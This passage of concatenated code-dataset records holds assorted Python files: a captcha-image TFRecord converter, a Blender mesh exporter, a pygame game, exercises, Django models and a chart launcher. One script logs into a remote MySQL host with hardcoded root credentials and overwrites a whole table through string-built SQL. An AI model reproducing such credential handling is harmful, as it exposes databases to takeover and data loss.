getComputeNodeDict(self):\r\n return self.computeNodeDict","sub_path":"healthcheck/health1.0-0.sles11/bin/modules/computeNode.py","file_name":"computeNode.py","file_ext":"py","file_size_in_byte":20254,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"73607455","text":"import tensorflow as tf\nimport numpy as np\nfrom PIL import Image\nimport os\nimport random\nimport sys\n\n# Number of validation images\n_NUM_TEST = 500\n# Random seed\n_RANDOM_SEED = 0\n# Dataset path\nDATASET_DIR = 
'/Users/mobvoi/workspace/code/generate_chapter'\n# DATASET_DIR = '/Users/knight/Desktop/mobvoi/valid_code/my_code'\n# Directory where the tfrecord files are stored\nTFRECORD_DIR = './image/tfrecord/'\n\n\n# Check whether the tfrecord files already exist\ndef _dataset_exists(dataset_dir):\n for split_name in ['train', 'test']:\n output_filename = os.path.join(TFRECORD_DIR, split_name + '.tfrecords')\n if not tf.io.gfile.exists(output_filename):\n return False\n return True\n\n\n# Collect all captcha image paths\ndef _get_filenames_and_classes(dataset_dir):\n photo_filenames = []\n for filename in os.listdir(dataset_dir):\n # Build the file path\n path = os.path.join(dataset_dir, filename)\n photo_filenames.append(path)\n return photo_filenames\n\n\ndef int64_feature(values):\n if not isinstance(values, (tuple, list)):\n values = [values]\n return tf.train.Feature(int64_list=tf.train.Int64List(value=values))\n\n# # xk start\n# def str_feature(values):\n# if not isinstance(values, (tuple, list)):\n# values = [values]\n# return tf.train.Feature(int64_list=tf.train.Int64List(value=values))\n# # xk end\n\n\ndef bytes_feature(values):\n return tf.train.Feature(bytes_list=tf.train.BytesList(value=[values]))\n\n\ndef image_to_tfexample(image_data, label0, label1, label2, label3):\n return tf.train.Example(features=tf.train.Features(feature={\n 'image': bytes_feature(image_data),\n 'label0': int64_feature(label0),\n 'label1': int64_feature(label1),\n 'label2': int64_feature(label2),\n 'label3': int64_feature(label3),\n }))\n\n\n# Convert the data to tfrecord format\ndef _convert_dataset(split_name, filenames, dataset_dir):\n assert split_name in ['train', 'test']\n\n with tf.Session() as sess:\n # Path and name of the tfrecord file\n output_filename = os.path.join(TFRECORD_DIR, split_name + '.tfrecords')\n with tf.python_io.TFRecordWriter(output_filename) as tfrecord_writer:\n for i, filename in enumerate(filenames):\n try:\n sys.stdout.write('\\r>> converting image %d / %d' % (i + 1, len(filenames)))\n sys.stdout.flush()\n\n # Read the image\n image_data = Image.open(filename)\n # Resize to match the model input\n image_data = image_data.resize((224, 224))\n # Convert to grayscale\n image_data = np.array(image_data.convert('L'))\n # Convert the image to bytes\n image_data = image_data.tobytes()\n\n # Extract the labels\n labels = filename.split('/')[-1][0:4]\n num_labels = []\n for j in range(4):\n num_labels.append(int(labels[j]))\n # num_labels.append(ord(labels[j]))\n\n # Build the protocol buffer example\n example = image_to_tfexample(image_data, num_labels[0], num_labels[1], num_labels[2], num_labels[3])\n tfrecord_writer.write(example.SerializeToString())\n\n except IOError as e:\n print('\\nCould not read:', filename)\n print('Error:', e)\n print('Skipping \\n')\n sys.stdout.write('\\n') # same effect as print\n sys.stdout.flush() # flush so progress is shown immediately rather than only at exit\n\n\n# Check whether the tfrecord files already exist\nif _dataset_exists(DATASET_DIR):\n print('file already exists')\nelse:\n # Collect all images\n photo_filenames = _get_filenames_and_classes(DATASET_DIR)\n\n # Shuffle and split the data into training and test sets\n random.seed(_RANDOM_SEED)\n random.shuffle(photo_filenames)\n training_filenames = photo_filenames[_NUM_TEST:]\n testing_filenames = photo_filenames[:_NUM_TEST]\n\n # Convert to tfrecord\n _convert_dataset('train', training_filenames, DATASET_DIR)\n _convert_dataset('test', testing_filenames, DATASET_DIR)\n print('------------- finished generating tfrecord files ------------------')\n","sub_path":"work_captcha_recognition/tfrecord/tfrecord_model_train/03_save_as_tfrecord.py","file_name":"03_save_as_tfrecord.py","file_ext":"py","file_size_in_byte":4266,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"133481850","text":"import bpy\nimport bmesh\nimport struct\nimport json\n\n\n
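# .mesh file layout written by write_mesh_file below, inferred from its struct.pack calls (an assumption, not an official format spec):\n# header: vertex count (int32), index count (int32)\n# body: per vertex -> position (3 x float32), normal (3 x float32), texture uv (2 x float32), lightmap uv (2 x float32); then index count x uint32 indices\n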
def write_mesh_file(blender_object, write_dir, filename=None):\n try:\n if len(blender_object.modifiers) > 0:\n mesh = blender_object.to_mesh(scene=bpy.context.scene,\n apply_modifiers=True,\n settings='PREVIEW')\n name = blender_object.name\n else:\n mesh = blender_object.data\n\n #Todo fix mesh sharing!\n #name = mesh.name\n name = blender_object.name\n\n mesh_type = blender_object.data.get(\"mesh_type\")\n except:\n raise RuntimeError(\"Error in object \" + blender_object.name)\n\n if mesh_type != \"none\":\n if filename is None:\n filename = write_dir + '/' + name + \".mesh\"\n\n print('Exporting: ' + filename)\n print(mesh_type)\n\n bm = bmesh.new()\n bm.from_mesh(mesh)\n\n bmesh.ops.triangulate(bm, faces=bm.faces, quad_method=2)\n\n indices = []\n positions = []\n normals = []\n texture_uvs = []\n lightmap_uvs = []\n\n if len(mesh.uv_layers) >= 2:\n texture_uv_layer = bm.loops.layers.uv[\"texture\"]\n lightmap_uv_layer = bm.loops.layers.uv[\"lightmap\"]\n\n for face in bm.faces:\n for loop in face.loops:\n texture_uv = loop[texture_uv_layer].uv\n texture_uv.y = 1.0 - texture_uv.y\n lightmap_uv = loop[lightmap_uv_layer].uv\n lightmap_uv.y = 1.0 - lightmap_uv.y\n vert = loop.vert\n positions.append(vert.co.to_tuple())\n normals.append(vert.normal.to_tuple())\n texture_uvs.append(texture_uv.to_tuple())\n lightmap_uvs.append(lightmap_uv.to_tuple())\n # one vertex is emitted per loop, so the index buffer is simply sequential\n indices.append(len(indices))\n else:\n raise Exception(mesh.name + \" must have two uv layers named texture and lightmap.\")\n bm.free()\n del bm\n\n mesh_file = open(filename, 'bw')\n\n # Header\n mesh_file.write(struct.pack('i', len(positions)))\n mesh_file.write(struct.pack('i', len(indices)))\n\n # Body\n for v in zip(positions, normals, texture_uvs, lightmap_uvs):\n mesh_file.write(struct.pack('fff', *v[0]))\n mesh_file.write(struct.pack('fff', *v[1]))\n mesh_file.write(struct.pack('ff', *v[2]))\n mesh_file.write(struct.pack('ff', *v[3]))\n\n for i in indices:\n mesh_file.write(struct.pack('I', i))\n\n mesh_file.close()\n\n\ndef write(write_dir, objects):\n scene = bpy.context.scene\n\n objects = [o for o in objects if o.type == 'MESH']\n\n for blender_object in objects:\n write_mesh_file(blender_object, write_dir)\n print(\"Object: \" + blender_object.name)\n if blender_object.find_armature():\n armature = blender_object.find_armature()\n for action in bpy.data.actions:\n animation = dict()\n animation[\"frame_rate\"] = scene.render.fps\n animation[\"keyframes\"] = list()\n armature.animation_data.action = action\n for index in range(scene.frame_start, scene.frame_end + 1, 5):\n scene.frame_set(index)\n mesh_name = blender_object.name + \"_\" + action.name.lower() + \"_\" + str(index) + \".mesh\"\n # each keyframe mesh gets its own explicit filename\n write_mesh_file(blender_object, write_dir, write_dir + '/' + mesh_name)\n animation[\"keyframes\"].append({\"key\": index, \"mesh\": mesh_name})\n\n animation_file = open(write_dir + '/' + blender_object.name + \"_\" + action.name.lower() + \".animation\", 'w')\n animation_file.write(json.dumps(animation))\n animation_file.close()\n\n\n\n","sub_path":"meshes.py","file_name":"meshes.py","file_ext":"py","file_size_in_byte":3762,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"343784440","text":"from lyza.analytic_solution import get_analytic_solution_vector\nfrom lyza.solver import apply_bcs, solve_scipy_sparse\nfrom lyza.function import Function\nfrom lyza.vtk import VTKFile\nimport logging\nimport numpy as np\nimport progressbar\n\n\ndef time_array(t_init, t_max, delta_t):\n result = [t_init]\n\n while result[-1] < t_max:\n result.append(result[-1] + 
delta_t)\n\n return result\n\n\ndef implicit_euler(\n m_form, a_form, b_form, dirichlet_bcs, u0_function, t_array, out_prefix=None\n):\n\n mesh = a_form.mesh\n function_size = a_form.function_size\n node_dofs = a_form.node_dofs\n\n A = a_form.assemble()\n M = m_form.assemble()\n\n u = Function(mesh, function_size)\n u.set_analytic_solution(u0_function)\n\n solution_vector = u.vector\n previous_solution_vector = None\n\n bar = progressbar.ProgressBar(max_value=len(t_array))\n\n if out_prefix:\n # u.set_vector(solution_vector)\n u.set_label(\"u\")\n ofile = VTKFile(\"%s%05d.vtk\" % (out_prefix, 0))\n ofile.write(mesh, u)\n\n for i in range(1, len(t_array)):\n t = t_array[i]\n delta_t = t_array[i] - t_array[i - 1]\n\n b_form.set_time(t)\n b = b_form.assemble()\n matrix = M + delta_t * A\n vector = M.dot(solution_vector) + delta_t * b\n\n for bc in dirichlet_bcs:\n bc.set_time(t)\n\n matrix_bc, vector_bc = apply_bcs(\n matrix, vector, mesh, node_dofs, function_size, dirichlet_bcs\n )\n # matrix_bc, vector_bc = apply_bcs(matrix, vector, u.function_space, dirichlet_bcs)\n previous_solution_vector = solution_vector\n solution_vector = solve_scipy_sparse(matrix_bc, vector_bc)\n\n if out_prefix:\n u.set_vector(solution_vector)\n ofile = VTKFile(\"%s%05d.vtk\" % (out_prefix, i))\n ofile.write(mesh, u)\n\n bar.update(i + 1)\n # logging.info('T = %f'%(t))\n bar.finish()\n\n u.set_vector(solution_vector)\n f = Function(mesh, function_size)\n f.set_vector(\n 1.0 / delta_t * M.dot(solution_vector - previous_solution_vector)\n + A.dot(solution_vector)\n )\n\n return u, f\n","sub_path":"lyza/time_integration.py","file_name":"time_integration.py","file_ext":"py","file_size_in_byte":2138,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"623144679","text":"import os\nimport random\nimport time\n\nimport pygame\nfrom helpers import AAfilledRoundedRect\n\n\nclass Settings:\n change_time = 1\n change_randomized = 0.2\n\n\nclass Image(pygame.sprite.Sprite):\n def __init__(self, image_files, left=0, top=0, scale=None):\n super().__init__()\n self.images = [pygame.image.load(image_file) for image_file in image_files]\n self.image = self.images[0]\n if scale:\n self.images = [pygame.transform.scale(image, scale) for image in self.images]\n self.rect = self.image.get_rect()\n self.rect.left = left\n self.rect.top = top\n\n\nclass GameBoard(Image):\n background = Image(['Sprites/background_cut.png'])\n size = width, height = 599, 468\n display_surf = pygame.display.set_mode(size, pygame.HWSURFACE | pygame.DOUBLEBUF)\n\n @staticmethod\n def render():\n GameBoard.display_surf.blit(GameBoard.background.image, (0, 0))\n myfont = pygame.font.Font('Sprites/duckhunt.ttf', 16)\n text = 'R = {}'.format(Game.round_count)\n textsurface = myfont.render(text, False, (0, 255, 0), (0, 0, 0))\n GameBoard.display_surf.blit(textsurface, (55, 384))\n AAfilledRoundedRect(GameBoard.display_surf, (50, 410, 62, 42), 'green', )\n AAfilledRoundedRect(GameBoard.display_surf, (51, 411, 60, 40), 'black', )\n AAfilledRoundedRect(GameBoard.display_surf, (145, 410, 252, 42), 'green', )\n AAfilledRoundedRect(GameBoard.display_surf, (146, 411, 250, 40), 'black', )\n AAfilledRoundedRect(GameBoard.display_surf, (440, 410, 110, 42), 'green', )\n AAfilledRoundedRect(GameBoard.display_surf, (441, 411, 108, 40), 'black', )\n pygame.display.update()\n\n\nclass Cursor(Image):\n def __init__(self):\n super().__init__(['Sprites/cursor.png'], left=500, top=350) # TODO\n # Load gunshot sound\n 
self.gunShotSound = pygame.mixer.Sound(os.path.join(os.getcwd(), 'Sounds', 'shot.wav'))\n # Hide mouse\n pygame.mouse.set_visible(False)\n self.clicked = False\n\n def update(self):\n mouse_x, mouse_y = pygame.mouse.get_pos()\n self.rect.left = mouse_x - self.rect.size[0] / 2\n self.rect.top = mouse_y - self.rect.size[1] / 2\n\n def on_click(self):\n self.gunShotSound.play()\n\n\nclass Dog(Image):\n def __init__(self):\n # TODO: different dog sprites\n super().__init__(['Sprites/dog.PNG', 'Sprites/dog_laugh.PNG'], left=500, top=350)\n self.image.set_colorkey(self.image.get_at((0, 0)), pygame.constants.RLEACCEL)\n self.dogWinSound = pygame.mixer.Sound(os.path.join(os.getcwd(), 'Sounds', 'howlovely.wav'))\n self.dogLoseSound = pygame.mixer.Sound(os.path.join(os.getcwd(), 'Sounds', 'eve.oga'))\n\n def celebration(self, cel_type):\n GameBoard.display_surf.blit(GameBoard.background.image, (0, 0))\n if cel_type == 'win':\n self.dogWinSound.play()\n GameBoard.display_surf.blit(self.image, self.rect)\n elif cel_type == 'loss':\n self.image = self.images[1]\n self.dogLoseSound.play()\n GameBoard.display_surf.blit(self.image, self.rect)\n pygame.display.update()\n\n\nclass Duck(Image):\n def __init__(self, duck_type, level_no):\n ducks = {'ola': 'blue',\n 'korwin': 'blue',\n 'lysy': 'red',\n 'janek': 'black'\n }\n # Point Values Based On Duck Color\n point_values = {\"blue\": 1000, \"red\": 1500, \"black\": 500} # TODO: should change depending on the level\n self.scale = (54, 57)\n super().__init__(['Sprites/{}/duck1.png'.format(ducks[duck_type])], left=250, top=200, scale=self.scale)\n self.image.set_colorkey(self.image.get_at((0, 0)), pygame.constants.RLEACCEL)\n self.velocity = 1 # TODO: depends on the level\n self.velocity_dead = 5\n self.alive = True\n self.duck_gone = False\n self.direction = (1, 0)\n self.last_change_time = time.time()\n\n def change_direction(self):\n direction_x = random.choice([-1, 1])\n direction_y = random.choice([-1, 0, 1])\n change_time = time.time() - self.last_change_time\n if not Subround.playground.contains(self.rect):\n if self.rect.left <= Subround.playground.left:\n direction_x = 1\n elif self.rect.right >= Subround.playground.right:\n direction_x = -1\n if self.rect.top <= Subround.playground.top:\n direction_y = random.choice([0, 1])\n elif self.rect.bottom >= Subround.playground.bottom:\n direction_y = random.choice([-1, 0])\n elif change_time > Settings.change_time and random.random() < Settings.change_randomized:\n self.last_change_time = time.time()\n else:\n return\n self.direction = (direction_x, direction_y)\n\n def update(self):\n if self.alive:\n self.update_alive()\n else:\n self.update_dead()\n\n def update_alive(self):\n self.rect.left += self.velocity * self.direction[0]\n self.rect.top += self.velocity * self.direction[1]\n self.change_direction()\n\n def update_dead(self):\n self.rect.top += self.velocity_dead\n if self.rect.bottom >= Subround.playground.bottom:\n self.duck_gone = True\n\n def on_click(self):\n if self.rect.collidepoint(pygame.mouse.get_pos()):\n self.alive = False\n\n\nclass Subround:\n playground = pygame.Rect(0, 0, 599, 302)\n\n def __init__(self):\n self._running = True\n self.duck_count = 2\n self.shots_left = 3\n self.countdown = 10\n self.crosshair = Cursor()\n self.duck = Duck('janek', 1) # TODO random\n self.dog = Dog()\n self.ducks_shot = 0\n self.start_time = time.time()\n\n def on_event(self, event):\n if event.type == pygame.QUIT:\n self._running = False\n pygame.quit()\n raise SystemExit # stop immediately; the display is gone once pygame.quit() runs\n if event.type == pygame.MOUSEBUTTONUP:\n self.shots_left -= 1\n 
self.crosshair.on_click()\n self.duck.on_click()\n if event.type == pygame.MOUSEMOTION:\n self.crosshair.update()\n\n def on_loop(self):\n self.crosshair.update()\n self.duck.update()\n if self.duck.duck_gone:\n self.ducks_shot += 1\n self.subround_end('win')\n elif self.shots_left <= 0 or time.time() - self.start_time > 7: # TODO variable\n self.subround_end('loss')\n\n def on_render(self):\n GameBoard.render()\n GameBoard.display_surf.blit(self.duck.image, self.duck.rect)\n if self.duck.alive:\n GameBoard.display_surf.blit(self.crosshair.image, self.crosshair.rect)\n pygame.display.update()\n\n def on_execute(self):\n self._running = True\n while self._running:\n for event in pygame.event.get():\n self.on_event(event)\n self.on_loop()\n self.on_render()\n return self.ducks_shot\n\n def subround_end(self, end_type):\n self.dog.celebration(end_type)\n time.sleep(2)\n self._running = False\n\n\nclass Round:\n ROUNDS = 2\n MIN_SUCCESS_COUNT = 0 # TODO: the minimum number of ducks to shoot should grow with each round\n\n def execute(self):\n ducks_shot = 0\n for i in range(self.ROUNDS):\n subround = Subround()\n ducks_shot += subround.on_execute()\n return self.end_round(ducks_shot >= self.MIN_SUCCESS_COUNT)\n\n def end_round(self, is_win):\n myfont = pygame.font.SysFont('Comic Sans MS', 50)\n text = 'Round won!' if is_win else 'Round lost!'\n textsurface = myfont.render(text, False, (0, 0, 0))\n GameBoard.display_surf.blit(textsurface, (100, 100))\n pygame.display.update()\n time.sleep(1)\n return is_win\n\n\nclass Game:\n round_count = 0\n _running = True\n\n def on_init(self):\n pygame.mixer.pre_init(22050, -16, 2, 1024)\n pygame.init()\n pygame.font.init()\n pygame.mixer.quit()\n pygame.mixer.init(22050, -16, 2, 1024)\n pygame.display.set_caption('Dudu Hunt')\n return True\n\n @staticmethod\n def cleanup():\n # TODO display game over\n # TODO go to start screen?\n pygame.quit()\n\n def render(self):\n pass\n # TODO display round number\n # TODO display shots left\n # TODO display ducks hit + timer\n # TODO display score\n\n def execute(self):\n if not self.on_init():\n self._running = False\n\n while self._running:\n self.round_count += 1\n self.render()\n game_round = Round()\n round_result = game_round.execute()\n self._running = round_result\n self.cleanup()\n\n\nif __name__ == \"__main__\":\n theApp = Game()\n theApp.execute()\n","sub_path":"DuduHunt.py","file_name":"DuduHunt.py","file_ext":"py","file_size_in_byte":8882,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"364562685","text":"import math\nimport os\nimport random\nimport re\nimport sys\n\nclass SinglyLinkedListNode:\n def __init__(self, node_data):\n self.data = node_data\n self.next = None\n\nclass SinglyLinkedList:\n def __init__(self):\n self.head = None\n self.tail = None\n\n def insert_node(self, node_data):\n node = SinglyLinkedListNode(node_data)\n\n if not self.head:\n self.head = node\n else:\n self.tail.next = node\n\n\n self.tail = node\n\ndef print_singly_linked_list(node, sep, fptr):\n while node:\n fptr.write(str(node.data))\n\n node = node.next\n\n if node:\n fptr.write(sep)\n\n# Complete the findMergeNode function below.\n\n#\n# For your reference:\n#\n# SinglyLinkedListNode:\n# int data\n# SinglyLinkedListNode next\n#\n#\ndef findMergeNode(head1, head2):\n ''' Given two linked lists, it returns the value of the node where the two lists join (they both point to the same node reference)\n\n '''\n\n visited_nodes1 = []\n visited_nodes2 = []\n\n while head1 
is not None or head2 is not None:\n if head1 is not None:\n visited_nodes1.append(head1)\n \n if head1 in visited_nodes2:\n return head1.data\n\n head1 = head1.next\n\n if head2 is not None:\n visited_nodes2.append(head2)\n\n if head2 in visited_nodes1:\n return head2.data\n \n head2 = head2.next\n \n return -1\n\n","sub_path":"app/data_structures/linkedlist/find_merge_point.py","file_name":"find_merge_point.py","file_ext":"py","file_size_in_byte":1489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"164718520","text":"import re\n\nn = int(input())\nattacked_and_destroyed_planets = {\"A\": [], \"D\": []}\n\nfor _ in range(n):\n encrypted_message = input()\n letters = [\"s\", \"t\", \"a\", \"r\"]\n matches = [char for char in encrypted_message.lower() if char in letters]\n\n key = len(matches)\n decrypted_message = \"\"\n\n for char in encrypted_message:\n ascii_value = ord(char) - key\n decrypted_message += chr(ascii_value)\n\n pattern = r\"@(?P<name>[A-Za-z]+)[^@\\-!:>]*:(?P<population>\\d+)[^@\\-!:>]*!(?P<attack>[AD])![^@\\-!:>]*->(?P<soldiers>\\d+)\"\n planet_data = re.search(pattern, decrypted_message)\n\n if planet_data: # if valid\n planet_name = planet_data[\"name\"]\n attack_type = planet_data[\"attack\"]\n\n if attack_type == \"A\":\n attacked_and_destroyed_planets[\"A\"] += [planet_name]\n elif attack_type == \"D\":\n attacked_and_destroyed_planets[\"D\"] += [planet_name]\n\n\nfor attack_type, planet_names in attacked_and_destroyed_planets.items():\n if attack_type == \"A\":\n print(f\"Attacked planets: {len(planet_names)}\")\n for planet in sorted(planet_names):\n print(f\"-> {planet}\")\n\n elif attack_type == \"D\":\n print(f\"Destroyed planets: {len(planet_names)}\")\n for planet in sorted(planet_names):\n print(f\"-> {planet}\")\n\n","sub_path":"18. Regular Expressions - Exercise/more_ex_03_star_engima.py","file_name":"more_ex_03_star_engima.py","file_ext":"py","file_size_in_byte":1304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"371054529","text":"#!/usr/bin/python\n# -*- coding: UTF-8 -*-\n\nimport MySQLdb\n\n# Open the database connection\ndb = MySQLdb.connect(\"tx.3cat.top\",\"root\",\"123\",\"minsu\",3306)\n# Get a cursor with the cursor() method\ncursor = db.cursor()\n# Run the SQL statement with the execute method\ncursor.execute(\"SELECT id,value FROM PropertyValue\")\n# fetchone() fetches a single row\n# fetchall() fetches all rows\ndata = cursor.fetchall()\nfor my_tuple in data:\n id_ = my_tuple[0]\n value_ = '好'\n sql = 'UPDATE PropertyValue SET value=\"%s\" WHERE id=%d' % (value_,id_)\n try:\n cursor.execute(sql)\n db.commit()\n except:\n db.rollback()\n print(sql)\n\n# Close the database connection\ndb.close()\nprint(\"Change OK!\")\n","sub_path":"database/change_dbvalue.py","file_name":"change_dbvalue.py","file_ext":"py","file_size_in_byte":715,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"217305293","text":"'''\nYour function should take in a single parameter (a string `word`)\nYour function should return a count of how many occurrences of ***\"th\"*** occur within `word`. Case matters.\nYour function must utilize recursion. 
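For example, count_th('thasnth') should return 2, while count_th('Thth') should return 1, since the capitalised 'Th' does not match. 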
It cannot contain any loops.\n'''\n\n# # --> this is how i originally did it until i saw 'single-parameter' constraint above\n# def count_th(word, counter = 0):\n# word_length = len(word)\n# if word_length <= 1: # base-case: stop when word_length <= 1 (b/c 'th' is two characters)\n# return counter\n# if word[:2] == \"th\":\n# counter += 1\n# return count_th(word[1:], counter)\n\n# # --> another way to do it? ... using the built-in count()\n# def count_th(word):\n# return word.count('th')\n\nword1 = 'thasnthadnth'\nword2 = '1231241'\n\ndef count_th(word):\n if len(word) <= 1: # base-case: stop when word_length <= 1 (b/c 'th' is two characters)\n return 0\n # if first two letters we are looking at are 'th'\n # --> return '1' (because 'th' occurs there)\n # --> plus recursively run count_th on rest of word\n # --> starting at index 2 bc we know word[1] is 'h'\n if word[0:2] == 'th':\n return 1 + count_th(word[2:])\n else: # 'th' does not occur at word[0] - word[1], so start again at word[1]\n return count_th(word[1:])\n\n\n\nprint(count_th(word1), count_th(word2)) # should be --> 3 0 ","sub_path":"recursive_count_th/count_th.py","file_name":"count_th.py","file_ext":"py","file_size_in_byte":1357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"29226753","text":"# -*- coding: UTF-8 -*-\nfrom django.contrib.auth.models import User\nfrom django.db import models\nfrom django.forms.models import model_to_dict\nfrom random import randint\nimport json\n\ncombinations = 1024\n\nclass Config(models.Model):\n\t\n\t\"We support 2 types of experiment\"\n\t\n\texperimentTypeChoices = (\n\t\t( 1, u'Bez sprzężenia zwrotnego'),\n\t\t( 2, u'Ze sprzężeniem zwrotnym'),\n\t)\n\t\n\texperimentType = models.IntegerField(choices = experimentTypeChoices, default = 2)\n\n\t\"Without feedback type options\"\n\t\n\twithoutFeedbackDisplayChoices = (\n\t\t( 1, u'Ograniczony czas wyświetlania'),\n\t\t( 2, u'Wyswietlanie z opóźnieniem'),\n\t)\n\t\n\twithoutFeedbackDisplayTime = models.IntegerField(choices = withoutFeedbackDisplayChoices, default = 1)\n\t\n\twithoutFeedbackDisplayFixedTime = models.IntegerField(default = 1000)\n\t\n\twithoutFeedbackDisplayUserDependentTime = models.IntegerField(default = 1000)\n\n\t\"With feedback type options\"\n\t\n\twithFeedbackErrorDisplayChoices = (\n\t\t( 1, u'Brak reakcji'),\n\t\t( 2, u'Zapal lampke na czerwono'),\n\t\t( 3, u'Zapal lampke i sygnał dźwiękowy'),\n\t)\n\t\n\twithFeedbackErrorDisplay = models.IntegerField(choices = withFeedbackErrorDisplayChoices, default = 2)\n\t\n\twarmupDuration = models.IntegerField(default = 2)\n\nclass ExperimentHistory(models.Model):\n\t\n user = models.ForeignKey(User)\n\t\n config = models.ForeignKey(Config)\n \n def nextCombination(self):\n \n done = self.combinationstatistics_set.all()\n \n toDraw = set()\n for i in range(1, combinations):\n toDraw.add(i)\n for task in done:\n toDraw.remove(task.combination)\n toDraw = list(toDraw)\n \n return toDraw[randint(0, len(toDraw) - 1)]\n \n def isFinished(self):\n if self.combinationstatistics_set.count() == combinations - 1:\n return True\n return False\n \n \nclass CombinationStatistics(models.Model):\n\t\n combination = models.IntegerField()\n\t\n answer = models.CharField(max_length = 1000)\n\t\n experiment = models.ForeignKey(ExperimentHistory)\n \n def getCombinationTableString(self):\n ans = [0,0,0,0,0,0,0,0,0,0]\n number = self.combination\n it = 0\n while (number > 0 and it < 10):\n if (number % 2 != 0):\n ans[it] = 1\n number = number // 2\n it 
= it + 1\n return str(ans).replace(\" \", \"\")\n\nclass TrainingStatus(models.Model):\n \n combinationsLeft = models.IntegerField(default = 0)\n \n user = models.ForeignKey(User)\n\nclass Key(models.Model):\n\n\tnumber = models.IntegerField(unique = True)\n\t\n\thotkey = models.CharField(max_length = 1)\n\ndef giveResearchData(user):\n \n experiments = user.experimenthistory_set.all()\n for experiment in experiments:\n if (not experiment.isFinished()):\n return {'config': json.dumps(model_to_dict(experiment.config)),\n 'config_m': experiment.config,\n 'combination': experiment.nextCombination()}\n config = None\n if (not experiments):\n config = Config.objects.order_by('-id')[0]\n TrainingStatus(combinationsLeft = config.warmupDuration, user = user).save()\n else:\n config = experiments[0].config\n newExperiment = ExperimentHistory(user = user, config = config)\n newExperiment.save()\n return {'config': json.dumps(model_to_dict(config)),\n 'config_m': config,\n 'combination': newExperiment.nextCombination()}\n \ndef saveCombinationStatistics(data):\n \n experiments = data['user'].experimenthistory_set.all()\n current = None\n for experiment in experiments:\n if (not experiment.isFinished()): \n current = experiment\n new_stats = CombinationStatistics(combination = int(data['number']), answer = data['answer'], experiment = current)\n new_stats.save()\n\ndef giveTrainingData(user):\n \n trainingStatus = user.trainingstatus_set.all()[0]\n return trainingStatus.combinationsLeft\n \ndef saveTraining(user):\n \n trainingStatus = user.trainingstatus_set.all()[0]\n trainingStatus.combinationsLeft -= 1\n trainingStatus.save()\n","sub_path":"experiment1023/core/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":4132,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"139798094","text":"from .address_handler import AddressHandler\nfrom .date_handlers import DateHandler, MonthYearDateHandler, YearDateHandler\nfrom .dropdown_handler import DropdownHandler\nfrom .duration_handler import DurationHandler\nfrom .mobile_number_handler import MobileNumberHandler\nfrom .number_handler import NumberHandler\nfrom .select_handlers import SelectHandler, SelectMultipleHandler\nfrom .string_handler import StringHandler\nfrom .text_area_handler import TextAreaHandler\n\nFIELD_HANDLER_MAPPINGS = {\n \"Checkbox\": SelectMultipleHandler,\n \"Radio\": SelectHandler,\n \"Relationship\": SelectHandler,\n \"TextArea\": TextAreaHandler,\n \"TextField\": StringHandler,\n \"Dropdown\": DropdownHandler,\n \"Number\": NumberHandler,\n \"Currency\": NumberHandler,\n \"Unit\": NumberHandler,\n \"Percentage\": NumberHandler,\n \"Date\": DateHandler,\n \"MonthYearDate\": MonthYearDateHandler,\n \"YearDate\": YearDateHandler,\n \"Duration\": DurationHandler,\n \"Address\": AddressHandler,\n \"MobileNumber\": MobileNumberHandler,\n}\n\n\ndef get_field_handler(\n answer,\n error_messages,\n answer_store,\n metadata=None,\n location=None,\n disable_validation=False,\n question_title=None,\n):\n return FIELD_HANDLER_MAPPINGS[answer.get(\"type\")](\n answer,\n error_messages=error_messages,\n answer_store=answer_store,\n metadata=metadata,\n location=location,\n disable_validation=disable_validation,\n question_title=question_title,\n )\n","sub_path":"app/forms/field_handlers/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1484,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} 
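# --- annotation (not a dataset record): minimal usage sketch for the field-handler module above;
# --- the answer schema and the empty error-messages mapping are illustrative assumptions only
# handler = get_field_handler(
#     {"type": "Number", "id": "turnover"},  # hypothetical answer definition
#     error_messages={},                     # hypothetical message overrides
#     answer_store=None,
# )
# FIELD_HANDLER_MAPPINGS keys on answer["type"], so this dispatches to NumberHandler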
+{"seq_id":"88122204","text":"#!/usr/bin/env python\n# coding=utf-8\n# author: zengyuetian\n# 展示小区图表信息(仅仅支持MAC)\n# 1. 杀死之前启动的http服务器\n# 2. 启动一个新的http服务器\n# 3. 用浏览器打开生成的数据html文件\n\nimport pandas as pd\nimport argparse\nfrom pyecharts import Bar\n\nimport os\nimport string\nimport time\nfrom lib.utility.version import PYTHON_3\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='regression vm')\n parser.add_argument('--csv_file', help='csv file', default='xiaoqu.csv')\n parser.add_argument('--range', help='range', default='0,5')\n\n args = parser.parse_args()\n csv_file = args.csv_file\n [min_num, max_num] = args.range.split(',')\n min_num = int(min_num)\n max_num = int(max_num)\n\n try:\n import webbrowser as web\n auto_browse = True\n except Exception as e:\n auto_browse = False\n\n if auto_browse:\n try:\n if PYTHON_3:\n os.system(\"ps aux | grep python | grep http.server | grep -v grep | awk '{print $2}' | xargs kill\")\n os.system(\"python3 -m http.server 8080 & > /dev/null 2>&1 \")\n else:\n os.system(\"ps aux | grep python | grep SimpleHTTPServer | grep -v grep | awk '{print $2}' | xargs kill\")\n os.system(\"python -m SimpleHTTPServer 8080 & > /dev/null 2>&1 \")\n except Exception as e:\n print(e)\n\n # 注意,已经将分割符号转换成分号,因为有的小区名中有逗号\n names = ['district', 'area', 'name', 'price', 'on_sale']\n df = pd.read_csv(csv_file, encoding=\"utf-8\", sep=\";\", names=names)\n # 打印总行数\n print(\"row number is 